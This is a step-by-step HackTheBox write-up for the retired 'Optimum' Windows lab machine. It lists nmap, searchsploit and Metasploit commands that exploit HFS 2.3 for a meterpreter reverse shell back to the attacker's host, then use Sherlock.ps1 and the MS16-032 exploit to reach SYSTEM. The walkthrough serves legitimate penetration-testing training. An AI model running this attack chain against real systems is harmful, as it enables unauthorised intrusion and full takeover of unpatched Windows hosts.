Optimum HackTheBox WalkThrough

This is Optimum HackTheBox machine walkthrough. In this writeup, I have demonstrated step-by-step how I rooted to Optimum HTB box. Before starting let us know something about this machine. It is a windows box with IP address 10.10.10.8 and difficulty easy assigned by it’s maker.

This machine is currently retired so you will require VIP subscription at hackthebox.eu to access this machine. Before starting, connect your PC with VPN and confirm your connectivity with optimum machine by pinging the IP 10.10.10.8. If you are getting connectivity problem then make sure optimum machine in running on the lab. If all correct then start hacking.

As usual, I started by scanning the machine. Scanning gives us an idea how we have to proceed further. Like, it helps in banner grabbing the services running over different ports and sometimes it helps in vulnerability scanning also. I have used nmap port scanner for this job. Nmap gave the following result:-

Scanning

$ nmap -sC -sV -T3 -oN optimum_scan 10.10.10.8

Nmap revealed that only port 80 is open and HttpFileServer is running on this port and its version is 2.3. Soon I get any software and its version then immediately I search for available exploits using Searchsploit.

Searching Exploit

$ searchsploit HFS 2.3

Searchsploit listed two Remote Code Execution exploits. Therefore, we have two different ways by which we can execute code remotely on optimum machine to get reverse shell. Further, searching hfs in metasploit gave a metasploit-module exploit/windows/http/rejetto_hfs_exect for this RCE exploit. Used this module to get reverse shell and could easily get shell.

Getting User Shell

$ search rejetto

msf5 > use exploit/windows/http/rejetto_hfs_exec

msf5 exploit(windows/http/rejetto_hfs_exec) > set RHOSTS 10.10.10.8

msf5 exploit(windows/http/rejetto_hfs_exec) > set SRVHOST 10.10.14.5

msf5 exploit(windows/http/rejetto_hfs_exec) > set PAYLOAD

windows/x64/meterpreter/reverse_tcp

msf5 exploit(windows/http/rejetto_hfs_exec) > set LHOST 10.10.14.5

msf5 exploit(windows/http/rejetto_hfs_exec) > exploit

meterpreter > sysinfo

Tip: Always use compatible payload with the exploit. For example, if your exploit target is x64 bit machine then you should prefer using x64 bit payload. Otherwise, you may get error like, your session may close as soon as it opens or it will not open completely when machine is exploited.

Got a meterpreter shell. Upgraded this shell to fully qualified cmd shell so that we could have more options for executing windows command.

Upgrading Shell

$ shell

We are logged in as user kostas. Let us grab user flag.

Capture User Flag

$ type user.txt.txt

Privilege Escalation

For escalating the privilege to administrator user I had to first find some Privilege Escalation Vector using which I could gain admin shell. For finding PrivEsc vector I used post/multi/recon/local_exploit_suggester (a post exploitation module which searches for possible kernel exploits whose patches are not installed in the compromised machine) module of metasploit. To use this module exited from the shell by using exit command and then used background command to background the shell.

$ exit

meterpreter > background

Finding PrivEsc Vector

post/multi/recon/local_exploit_suggester module listed two potential exploits that could be used to escalate privilege. After trying both of them, could not escalate because they gave result, not vulnerable.

msf5 exploit(windows/http/rejetto_hfs_exec) > search exploit_suggester

msf5 exploit(windows/http/rejetto_hfs_exec) > use

post/multi/recon/local_exploit_suggester

msf5 post(multi/recon/local_exploit_suggester) > set SESSION 1

msf5 post(multi/recon/local_exploit_suggester) > run

Then ran post exploitation enumeration script Sherlock.ps1 which is a PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities. It found that ms16-032 could be used to escalate privilege. So here, our Privilege Escalation Vector is Kernel Exploit.

You can clone sherlock from it’s GitHub repository

Running Sherlock.ps1 through Meterpreter

$ sessions -i 1

meterpreter > load powershell

meterpreter > powershell_import /root/HackTheBox/Optimum/Sherlock/Sherlock.ps1

meterpreter > powershell_execute Find-AllVulns

Sherlock.ps1 listed three kernel exploits namely MS16-032, MS16-034 & MS16-135 and among them only MS16-032 exploit worked. Let us escalate the privilege to administrator.

Getting Root Shell

meterpreter > background

msf5 exploit(windows/http/rejetto_hfs_exec) > search ms16-032

msf5 exploit(windows/http/rejetto_hfs_exec) > use

exploit/windows/local/ms16_032_secondary_logon_handle_privesc

msf5 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set PAYLOAD windows/x64/meterpreter/reverse_tcp

msf5 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set LHOST 10.10.14.5

msf5 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set SESSION 1

msf5 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > run

meterpreter > getuid

We are NT AUTHORITY\SYSTEM which is the highest privilege in the windows system.

Capture Root Flag

$ type \Users\Administrator\Desktop\root.txt

This is how I rooted Optimum HackTheBox machine. Learnt a lot after rooting this box. Hope you guys have also learnt some new things from this box. Thanks for reading this writeup. Write your experience in the comment section. For any suggestion and query related to walkthrough feel to write us at [email protected].

Next upcoming box walkthrough will be Bastard Windows machine.